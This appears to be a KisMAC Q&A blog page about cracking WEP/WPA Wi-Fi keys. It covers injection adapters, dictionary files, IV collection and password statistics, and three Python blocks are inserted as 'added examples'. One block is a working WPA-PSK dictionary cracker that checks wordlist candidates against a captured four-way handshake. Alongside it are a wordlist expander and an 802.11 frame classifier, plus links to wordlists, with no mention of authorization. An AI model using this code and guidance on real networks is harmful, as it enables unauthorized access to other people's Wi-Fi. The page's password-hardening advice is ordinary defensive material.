
KisMAC Questions & Answers

KisMAC Q&A


Please, before asking, be sure to read everything. Answering the same questions 5 times is time consuming.
There is a "Search" box for the blog in the top left corner. Thanks!

ALL QUESTIONS WITHOUT the KisMAC version and the full OS version will be ignored or flamed. Include the model and FCC number of the network adapter (the USB thingy) if applicable. And YES, the FCC number is on it! And NO, it's not the MAC address.

Example:
Kismac + OS X = Ignored
FCC ID : MAC 01:23:12:20:ff:88 = Ignored
KisMAC 0.3 + OS X 10.6.4 = Answered
Kysmaxx + win 95 = Flamed


Question:
"I got a problem getting a WPA key.
I got the data packets OK, I get the green light with the deauthentication, but when I ask to find the WPA I get this:
"The WPA key could not be recovered because of the following reason: the key was none of the tested passwords.."

Answer:
The file used needs to have the exact password in it. The words are tested "as is" and not in combination.
Example: the password is "I love Kismac".
If your dictionary contains the words "I" + "love" + "Kismac" on separate lines it will NOT work; your dictionary must contain the exact "I love Kismac" as one line to successfully crack it. (Also, a WPA passphrase is 8 to 63 characters long, so anything shorter in the list is wasted time.)
Be also sure to use a properly formatted file: a simple .txt will work perfectly.

-----------------

Question:
2 questions:
- to crack a WPA key, what kind of USB device do I need? (name please)
- what does "dictionary file" mean?

Answer:
Dictionary file OR wordlist are files containing simple words or sentences to be tried against the key. They often contain hundreds of thousands of words related to a subject, e.g. last names, first names, Yiddish words, bacteria, etc. You can also find the 500 most used passwords,
or take a list and expand it by modification or concatenation*.

Excel wordlist expander
link posted : http://aloah.free.fr/Mactips/home_En.html

*Concatenate: to add strings together. "qwerty" +"1234"= "qwerty1234"
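Here is what "expanding a list by modification or concatenation" looks like in code, as an added example for this page (it is not the Excel expander linked above and not KisMAC's code; the base words and the digit and symbol affixes are made up for the demo). It also drops anything outside the 8 to 63 character WPA passphrase range, since those lines can never match, and writes one candidate per line with the trailing newline KisMAC wants:

```python
"""Wordlist expander: grow a small base list by case changes, prefixes
and suffixes (concatenation), then keep only WPA-length candidates.

Added example for this page; it is not the Excel expander linked above
and not KisMAC code.  The base words and affixes are made up here.
"""

BASE_WORDS = ["qwerty", "I love Kismac", "Boston"]      # constructed sample
DIGIT_AFFIXES = ["1", "12", "123", "1234", "2009"]      # constructed sample
SYMBOL_SUFFIXES = ["!", "$"]                            # constructed sample


def case_variants(word):
    """Yield the word as-is, Capitalized and UPPERCASE."""
    yield word
    yield word.capitalize()
    yield word.upper()


def expand(words, prefixes=(), suffixes=(), min_len=8, max_len=63):
    """Return an ordered, de-duplicated list of candidate passphrases.

    Each candidate is one full passphrase per line: 'qwerty' + '1234'
    becomes 'qwerty1234'.  Words are never combined with each other,
    which is also how KisMAC treats the list (every line is tried as-is),
    so multi-word passphrases such as 'I love Kismac' must already be a
    single entry in the base list.  min_len/max_len default to the WPA
    passphrase limits (8..63 characters).
    """
    seen = set()
    out = []

    def keep(candidate):
        if min_len <= len(candidate) <= max_len and candidate not in seen:
            seen.add(candidate)
            out.append(candidate)

    for word in words:
        for variant in case_variants(word):
            keep(variant)
            for suf in suffixes:
                keep(variant + suf)
            for pre in prefixes:
                keep(pre + variant)
                for suf in suffixes:
                    keep(pre + variant + suf)
    return out


def render_wordlist(candidates):
    """Plain text, one candidate per line, with the trailing newline
    (the "empty line at the end") KisMAC expects."""
    return "\n".join(candidates) + "\n"


if __name__ == "__main__":
    words = expand(BASE_WORDS, prefixes=DIGIT_AFFIXES,
                   suffixes=DIGIT_AFFIXES + SYMBOL_SUFFIXES)
    print(len(words), "candidates")
    print(render_wordlist(words[:5]), end="")
```

Note that "qwerty" itself never makes it into the output (6 characters is below the WPA minimum), while "qwerty1234" and "2009qwerty!" do; a six-character base word only becomes useful once something is concatenated to it.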

 -----------------

Question:
I can't collect IV's

Answer:
 Look at the troubleshooting article, multiple answers posted

 -----------------

Question:
what kind of USB device i need?

Answer:
Already posted multiple times

-----------------

Question:
I can't seem to be able to collect IVs / IV collection is very slow

Answer:
You need to look first at the number of packets collected:
 Packets
 Data Packets
 Management Packets
 Control Packets
 Unique IV

We are looking at the ratio between Packets and Data Packets. Data Packets are the good stuff: for WEP, every encrypted data packet carries a 3-byte IV, while management and control frames carry none.
If you have a lot of packets with a lot of management packets, it means that you are listening to a non-active network. A bit like listening to static on the radio: nothing good to listen to.

To give you an example, I have at home multiple WiFi devices. Some are wireless backup HDDs.
So, if you come nearby, you'll see multiple networks. The issue is that the wireless backup is NOT connected to the internet, and only "working" when I am doing a backup. So you could listen for a long time, getting management packets, but zero IVs, and very little good stuff.

The other issue could be that everything is OK, but the connection is not very active. Somebody left the computer on and went to work. Almost no traffic. Packet collection is going to be slow.
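To make the counters above concrete, here is an added example (not KisMAC code) that classifies raw 802.11 frames by type the way the packet panel does and counts unique WEP IVs; the BSSID, client MAC and the eight frames are constructed for the demo. Management and control frames never carry an IV, and neither do data frames on an open network, which is why a capture full of beacons gives you "zero IV's":

```python
"""Classify raw 802.11 frames the way KisMAC's counters do (Packets,
Data, Management, Control, Unique IV) and judge whether a network is
worth listening to.

Added example, not KisMAC code.  The frames below are constructed by
hand: two beacons, a probe response, an ACK, three WEP data frames and
one open-network data frame.
"""
from collections import Counter

TYPE_MGMT, TYPE_CTRL, TYPE_DATA = 0, 1, 2

AP = bytes.fromhex("001122334455")      # constructed AP BSSID
STA = bytes.fromhex("66778899aabb")     # constructed client MAC
BCAST = b"\xff" * 6


def frame(fc0, fc1, a1, a2, a3, body=b"", a4=None, qos=False):
    """Build a minimal 802.11 frame: FC(2) dur(2) addr1-3 seq(2) [addr4] [QoS] body."""
    hdr = bytes([fc0, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x10\x00"
    if a4:
        hdr += a4
    if qos:
        hdr += b"\x00\x00"
    return hdr + body


def header_len(fc0, fc1):
    """Data-frame header length: 24 bytes, +6 when ToDS and FromDS are
    both set (addr4 present), +2 for QoS subtypes (subtype bit 3 set)."""
    n = 24
    if fc1 & 0x03 == 0x03:
        n += 6
    if fc0 & 0x80:
        n += 2
    return n


def classify(frames):
    """Return counts like KisMAC's packet panel.  A WEP IV is the first
    3 bytes after the header of a data frame with the Protected bit set."""
    counts = Counter(packets=0, data=0, management=0, control=0)
    ivs = set()
    for f in frames:
        if len(f) < 2:
            continue
        fc0, fc1 = f[0], f[1]
        ftype = (fc0 >> 2) & 0x3
        counts["packets"] += 1
        if ftype == TYPE_MGMT:
            counts["management"] += 1
        elif ftype == TYPE_CTRL:
            counts["control"] += 1
        elif ftype == TYPE_DATA:
            counts["data"] += 1
            off = header_len(fc0, fc1)
            if fc1 & 0x40 and len(f) >= off + 4:   # Protected flag set
                ivs.add(bytes(f[off:off + 3]))
    counts["unique_iv"] = len(ivs)
    return counts


def data_ratio(counts):
    """Fraction of captured frames that carry data ('the good stuff')."""
    return counts["data"] / counts["packets"] if counts["packets"] else 0.0


# Constructed capture (not from the air).
SAMPLE = [
    frame(0x80, 0x00, BCAST, AP, AP, b"\x00" * 12),                        # beacon
    frame(0x80, 0x00, BCAST, AP, AP, b"\x00" * 12),                        # beacon
    frame(0x50, 0x00, STA, AP, AP, b"\x00" * 12),                          # probe response
    bytes([0xD4, 0x00]) + b"\x00\x00" + AP,                                # ACK (control, RA only)
    frame(0x08, 0x42, STA, AP, AP, b"\x01\x02\x03\x00" + b"\xaa" * 8),     # WEP data, FromDS
    frame(0x08, 0x42, STA, AP, AP, b"\x01\x02\x03\x00" + b"\xbb" * 8),     # same IV reused
    frame(0x88, 0x41, AP, STA, AP, b"\x0a\x0b\x0c\x00" + b"\xcc" * 8, qos=True),  # QoS WEP data, ToDS
    frame(0x08, 0x02, STA, AP, AP, b"\xdd" * 12),                          # open-network data, no IV
]

if __name__ == "__main__":
    c = classify(SAMPLE)
    print(dict(c), "data ratio:", data_ratio(c))
```

Two of the three WEP data frames reuse the same IV, so three data packets only give two unique IVs; that gap between "Data Packets" and "Unique IV" is the number to watch when collection feels slow.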




What injection device should I use?
-The list of “approved” hardware is here: http://trac.kismac-ng.org/wiki/HardwareList
I have tried the Edimax EW-7318 USg, Hawking HWUG1 & HWUG1A (about $40)
The KisMAC Team highly recommends the Alfa AWUS036H (about $50)
I am not really impressed by the sensitivity of the Hawking “as is”, you may want to consider a high gain antenna, or the Alfa AWUS036H for better results.
I’ll try the Hawking with a directional antenna and post results, if any.

------------------

 Question:
 Can I use KisMAC with XP?

Answer:
 Dear,
 I am surprised:  how can you write if you can't read?  Are you two? one can read, one can write?
 If so, ask your twin for an answer.

-----------------

Question:
J said...
hi there, congrats for the nice job here.... i woud like to ask you if on a MBP I get a usb device rt73 Hawking HWUG1 for ex, do I need to install subversion, xcode and compile kismac explained on this link? http://screammy.name/projects/kismacmacbook/ I really hope not.... :) Will you advice me about the USB devise "rt73 Hawking HWUG1 "and "rt73 Hawking HWUG1A" , whats the diference between them and your opinion about this USB DEVICE "D-link DWL-G122? This blog will be from now on my favorites... Thanks in advance and keep the good work J.     Answer(s)..
Hey J, thanks for the cheer-up.
Do I need to compile KisMAC? ABSOLUTELY NOT.
The post on screammy.name is from 2006 (updated in 2007) ... KisMAC has evolved since.
"The current distribution of KisMAC does not allow you to use the AirPort Extreme card in passive mode" ... Yes it does.
Assuming that you are on OS X 10.5 or 10.6, just download version 0.2.99 via the Download menu here:
http://aloah.free.fr/mactips/Menu.html
Then watch the video "how to": http://www.youtube.com/watch?v=lBGN5OGCPgI
Watch it again (especially the warning). If you don't, you WILL be sorry. Breathe, take a break, and watch again.
Hawking: to the best of my knowledge, the difference between the two is that the HWUG1 is 11g and the HWUG1A is 11n.
As for hardware, what you want to be sure about is the chipset.
The chipset is the "engine". Never mind the body, you care about the engine.
Hint: double check the FCC number (and you'll realize that different brands have the same engine).
If you buy a non-compatible one... kiss your $ goodbye. The D-Link DWL-G122 has several revision numbers: http://trac.kismac-ng.org/wiki/DWL-G122
So I would apply the following formula: (CFU x D) - MS ^ SOL
CFU = Chances of F* up
D = Distance
MS = Money saved
SOL = Shit out of luck factor
In short: save 10 bucks to be in trouble, re-ship the whole thing, wait 2 weeks, not get your money back for the shipping, and get upset because "I did not know"...
Hawking, Edimax, Alfa or anything known to work without issues .... ;-)
I suppose you will read the troubleshooting and Q&A completely. You will save a great amount of time by doing so. How much time? Well, can you do it in less than 4 seconds?
Queries from Google Analytics
This is your way of asking a question: directly from the Google search bar. If you have arrived here, it's probably because your question was formulated in a strange way, but you are very close to an answer; just use the search on the top left of the blog. Very short answers below:

kismac ch/re >> Green, Orange or Red. All other colors are products of your imagination.
Injection Airport Extreme >> AirPort Extreme can NOT inject or re-inject.
kismac could not attach to the apple airport driver >> 99% chance it's your fault. Look into "Preferences".
Kismac injection does not work >> Test injection (Command + T)
Kismac injection not working >> Test injection (Command + T)
kismac weak scheduling attack taking long time >> Look at troubleshooting
kismac ew-7318usg tutorial rt73.plist >> App Cleaner ??
mac uninstall kismac >> App Cleaner + Plist

Question:
..I have an issue with KisMAC "hanging" for some minutes in a specific channel... it's not always the same, but till this moment it has only happened with ch 11, 12, 13 and 14... the other channels pass fast, but on these channels it "hangs" for some minutes and then continues the scan...

Answer:
Uncheck channels 12, 13 and 14. Those channels are not used in most countries and it can create interference: you are probably trying to listen to a microwave oven or an old cordless phone.

 

KisMAC Resources

KisMAC Resources, Wordlist, Dictionary files

Is there a KisMAC Tutorial?
Yes, a Video tutorial and a written one. Also a troubleshooting one and a debugger in progress.  it's here: http://tinyurl.com/nxdcsd

What injection device should I use?

Definitely this one: 
Best Wifi Card for KisMac  about 20 X more powerful than Airport or Hawking

This card is a winner hands down! 
Mentioning a Hawking or an Edimax as "competition" is a pure act of charity.


Otherwise, The list of “approved” hardware is here: http://trac.kismac-ng.org/wiki/HardwareList
I have tried the Edimax EW-7318 USg, Hawking HWUG1 & HWUG1A (about $40)
I am not really impressed by the sensitivity of the Hawking “as is”, nor by the Edimax.
After few tests and compared to the one mentioned above in "best card" I would not consider buying them again.

Nota Bene:
KisMAC will try every word (from the list provided) to attempt to crack the key, hence it may take a lot of time. For WPA, each guess costs a PBKDF2 derivation with 4096 iterations before the handshake can even be checked, which is why the rate is counted in words per second rather than thousands; if you have a slow machine, be really patient.
I have a not so bad machine, and I run about 170 words per second. You can leave a comment with your config and speed for me to compare.
Mine: MacBook Pro 2.5GHz Intel Core 2 Duo + 4GB DDR2 SDRAM : about 170 Word/sec

Can you find listing or maps of available networks?
-Yes you can, check the Wigle Webpage http://wigle.net

How to uninstall drivers? Plist?
Your best shot at uninstalling the plist is to use the free app called "App Cleaner".
You'll find the link, directions, etc. on the blog (left hand side).
If you have installed the drivers provided on a CD for a specific chipset, you will need:
admin rights, the use of Terminal, and to unload the driver before removing it. Unloading the driver only works for one session: when you reboot, the driver will be loaded again unless you have also removed it.

How to select a single channel?
Take a look at "Step B", the picture shows "all channel selected"
you just have to click on "none" and the check the single channel wanted
you can also use directly the tab "Channel"

I am a Super Geek, is there something more powerful than KisMAC?
Aircrack-ng (reserved for advanced users)
How to install Aircrack on a Mac: http://easymactips.blogspot.com/2010/10/how-to-install-aircrack-on-mac.html
Wireshark is also a powerful one, but not so friendly for the beginner.

Passwords Lists

One of the best is here:
http://easymactips.blogspot.com/2009/11/support-donate.html


Worst password list: Please, don't use them .....;-) they are often the first checked ....
http://aloah.free.fr/mactips/Wordlists.html
http://trac.kismac-ng.org/wiki/wordlists

List of Dictionary files or Wordlist / Wordlists
Sometimes called wordkey or word key (as per the results of your queries via Google Analytics).
For WPA attack:
http://aloah.free.fr/mactips/Wordlists.html
http://trac.kismac-ng.org/wiki/wordlists
or you can compile your own.
I suggest skipping passwords of 1, 2, 3 and 4 characters: very few people use 3-character passwords, and a brute force attack (in a tool that does one) would not take long on 3 characters anyway.
WPA:
Minimum 8 characters (maximum 63), so you can skip every candidate shorter than 8 characters.

Note on dictionary files:
The words are tested "as is" and not in combination.
Example: the password is "I love Kismac".
If your dictionary contains the words "I" + "love" + "Kismac" on separate lines it will NOT work; your dictionary must contain the exact "I love Kismac" as one line to successfully crack it.

The only way to end with a successful attack is to use a dictionary containing the (exact) passphrase.
Pure brute force attacks do NOT work with KisMAC (trying every single combination starting at "a", then "aa", "aaa", etc.). You need to provide KisMAC with a dictionary file in TXT format, one candidate per line, with an empty line at the end.
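The check KisMAC performs for each line, as an added example that is not KisMAC's code and serves both the first Q&A answer on this page and the note above: derive the PMK from the candidate and the SSID, expand it to the PTK, and compare the EAPOL MIC against the captured handshake. The SSID, MACs, nonces and EAPOL bytes are constructed here, and the "capture" is generated from a known passphrase so the example runs offline. It shows why "I", "love" and "Kismac" on separate lines never match, and where the per-guess cost comes from:

```python
"""WPA/WPA2-PSK dictionary attack against a captured 4-way handshake,
showing why every line of the wordlist is tried exactly as written.

Added example, not KisMAC code.  The "capture" below is constructed in
this file from a known passphrase; the SSID, MACs, nonces and EAPOL
bytes are made up.  Key derivation follows IEEE 802.11i:
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK = PRF-512(PMK),
MIC = HMAC(KCK, EAPOL-Key frame with the MIC field zeroed)[:16].
"""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: the 4096 PBKDF2 rounds are what make each guess slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                 hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(ptk, eapol_zeroed, wpa2=True):
    """Key MIC over the EAPOL-Key frame; the KCK is the first 16 bytes of the PTK.
    WPA2 (CCMP) uses HMAC-SHA1, original WPA (TKIP) uses HMAC-MD5."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(ptk[:16], eapol_zeroed, digest).digest()[:16]


def crack_wpa(capture, wordlist, min_len=8, max_len=63):
    """Try each line as the whole passphrase; return the match or None.
    Lines outside 8..63 characters cannot be a WPA passphrase and are skipped."""
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        if not min_len <= len(candidate) <= max_len:
            continue
        pmk = wpa_pmk(candidate, capture["ssid"])
        ptk = wpa_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                      capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def make_capture(passphrase, ssid):
    """Constructed handshake 'capture' for the demo (in reality it comes from the air)."""
    cap = {
        "ssid": ssid,
        "ap_mac": bytes.fromhex("001122334455"),   # constructed
        "sta_mac": bytes.fromhex("66778899aabb"),  # constructed
        "anonce": bytes(range(32)),                # constructed
        "snonce": bytes(range(32, 64)),            # constructed
        # EAPOL-Key message 2 with its 16-byte MIC field zeroed (constructed bytes)
        "eapol": b"\x01\x03\x00\x5f\x02\x01\x0a\x00" + b"\x00" * 87,
    }
    ptk = wpa_ptk(wpa_pmk(passphrase, ssid), cap["ap_mac"], cap["sta_mac"],
                  cap["anonce"], cap["snonce"])
    cap["mic"] = eapol_mic(ptk, cap["eapol"])
    return cap


CAPTURE = make_capture("I love Kismac", "KisMAC")     # constructed sample

if __name__ == "__main__":
    # The split words never match; only the exact passphrase as one line does.
    print(crack_wpa(CAPTURE, ["I", "love", "Kismac", "password"]))          # None
    print(crack_wpa(CAPTURE, ["password", "qwerty1234", "I love Kismac"]))  # I love Kismac
```

Every candidate costs one PBKDF2 derivation (thousands of HMAC-SHA1 calls) plus four more HMACs for the PTK and one for the MIC; at the 170 words per second quoted further down, a one-million-line list takes about an hour and a half, so length-filtering and a list built for the target beat a huge generic one.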

Password hints
A dictionary attack uses a list of existing words. Often those lists are all lowercase or mixed case, in English, and use "common" words.
The more complex your password, the greater the chance that trying all the possible combinations will take a mind-boggling and inhuman amount of CPU time (millions of years).
If you use KisMAC on a WPA attack, the only way to end with a successful attack is to use a dictionary containing the (exact) passphrase.
Brute force attacks do NOT work with KisMAC.
As a possible target of a WPA attack, "I" use stupid-strength passwords on full ASCII.
I do not use English words, or any common language, and I use lots of $igns and numbers.
So, how patient is the attacker?

Mnemonic tips
Instead of your "123456" dummy password you can use a HARD TO GUESS word and add numbers to it PLUS a second set of numbers typed while holding the "Shift" key.
Example: the maiden name of your mom is Kismac, her birthday is 07-12-1962.
You get "07121962Kismac)&_!@_!(^@"
That is a 24-character password that you can easily retain.
As KisMAC does not use pure brute force to crack WPA, you are pretty safe with a password like this; finding such a word in a dictionary would be... surprising.
Be aware that you can find lists of names, towns, zip codes, dates, etc. So using "Smith" or "Boston" is not really foolproof. Keep in mind that the whole string above is derived from two facts about you plus a fixed rule: it resists a plain wordlist, not someone who knows you and guesses the rule.

Even in the improbable case of a very, very tenacious "auditor", a 20-character full-ASCII password (255 possibilities per character) gives 255^20 possibilities (not 20^255).
How big is 255^20?
Well, that's about 1,351,461,283,755,590,000,000,000,000,000,000,000,000,000,000,000 (1.35 × 10^48). Even counting only the 95 printable ASCII characters it is still 95^20, about 3.6 × 10^39.
It's already stupid strong. Unless you are the NSA, it's probably out of your reach.

Update on Oct 6 2009.
You may have heard of the Yahoo! password heist*.
*(Dec 2009: Forget the Yahoo! heist, a bunch of highly educated monkeys running a website have left their entire database of passwords in clear plain text. The result is 32,000,000 passwords and logins stolen. More on that later....)

10,000 passwords and emails listed on the web, plus another 30,000 accounts of Gmail and Comcast compromised.
According to serious sources, the list was a possible snippet of 250,000 emails and passwords for resale.
Email? Not a big deal, huh? Who cares? They just need to go to your online banking and reset the password. They will get the message. You won't....
I could not access the list in time, but the excellent Reusable Security Blog did.
Here is his (Matt Weir) analysis about what you use:

So on to the analysis:
  • Total Passwords: 9,845 - This number excludes all the e-mail addresses that had blank passwords
  • Average Password Length: 8.7 characters long
  • Percentage that contained an UPPERCASE letter: 7.2%
  • Percentage that contained a special, (aka !@#$), character: 5.2%
  • Percentage that contained a digit: 51.7%
  • Percentage that only contained lowercase letters: 43.3%
  • Percentage that only contained digits: 17.6%
  • Percentage the started with a digit, (aka '1password'): 25.0%
  • Percentage that ended with a digit, (aka 'password1'): 44.1%
  • Percentage that started with a special character: 0.5%
  • Percentage that ended with a special character: 2.2%
  • Percentage that started with an uppercase letter: 6.1%
Overall letter frequency analysis:
aeoi1r0ln2st9mc83765u4dbpghyvfkjAzEIOxRLwSNq.MTC_DB-UP*G@H/ZYF+VJK,\$&X!Q=W?'#")(%^][}< {`>
First character, letter frequency analysis:
a1mbc2sp0lterdjfgn3hi6k759vo48yAwMzBSCuqPLExJRTFDGNV*HOZYKI\W@/-+(.$U&?Q^[,#
Last character, letter frequency analysis:
aos01326e57849nrilydzmtuAhbO.gck*SxpfE@+LvjNRw_-I?/$q!ZX)YKH"UPMDCB#GF'&%}T,]\VJ(
As a repeat, the previous is from Matt Weir, from Reusable Security

So, it tells me that there are still a large number of people using passwords vulnerable to dictionary attacks.
Furthermore:
40% of users are using the same password for everything.
92.8% did not use an UPPERCASE letter
94.8% did not use a special character
and the best: 17.6% only contained digits
Average length 8.7 >> rounded to 9 characters
For the 18% (of dummies) that only use digits:
Digits only = 10 possibilities per character. 9 characters long = 10^9 = 1,000,000,000 possible combinations.
Realistic number of tests before cracking: about half of that, 5 × 10^8.
At the 10,000,000 guesses per second assumed further down, that is under a minute (0.015 hour) = Joke.
For those 18%, read this carefully:
"Neil O'Neil, a digital forensics investigator at secure payments firm The Logic Group, found that "123456" cropped up on the list 64 times. There were 18 uses of the second most popular password, "123456789"."
Big surprise!!! Just like the ones mentioned in the 500 most used passwords. Can you guess what #3 and #4 were? Probably 1234567 and 12345678.
The 500 most used passwords list is 4 or 5 years old, but it seems like it was brand new.
#1 to #10: 123456, password, 12345678, 1234, pussy, 12345, dragon, qwerty, 696969, mustang

So, if I had to create a password list, guess what...

First on the list would be 8 or 9 characters long, all digits; then all lowercase; then adding a digit or two first; then adding a digit or two last.
That list should cover about 80% of all passwords.
That would be a big list, 7,518,774,324,736 candidates, but it would cover 80% of the general public. Not bad.
So, GET A REAL PASSWORD!

Because it's raining and I am bored:
Let's assume a cluster of 10,000 MacBook Pros, dual core etc., working all together for you (distributed):
A MacBook Pro, on intensive use, draws 263 watts and generates 894 BTU/h of heat.
Cracking rate: up to 10,000,000 passwords/second/computer, so 10^11 per second for the whole cluster.
If you do the math against the 255^20 candidates above (1.35 × 10^48 / 10^11 per second), you'll realize that brute-forcing a 20-character full-ASCII password keeps that cluster busy for something like 4 × 10^29 years, pumping out 2.6 megawatts of heat the whole time (a heat wave the size of Texas); the electricity bill is not even worth computing.
You could hit the jackpot and find the password within minutes, but on average it takes 50% of the maximum time to break a password.
This is the reason why keyloggers, phishing and clickjacking were invented. That's where, in my opinion, the real danger is...

KisMAC for Windows
I am not aware of a Windows version of KisMAC (KisDOWS???); nevertheless, you can Google NetStumbler, Aircrack, Airsnort, etc.
To the best of my knowledge, NetStumbler does not have cracking capabilities, nor the capability to uncloak hidden networks or deauthenticate clients.
If you want serious power, you'll need to forget about Windows (breaking news, huh?) and move on to Linux with Aircrack-ng.
If you download a (working) version of KisMAC for Windows, please let me know.
If you download one, especially from a torrent, I suggest you be VERY careful and scan the file left, right, up and down for viruses or malware. (hint)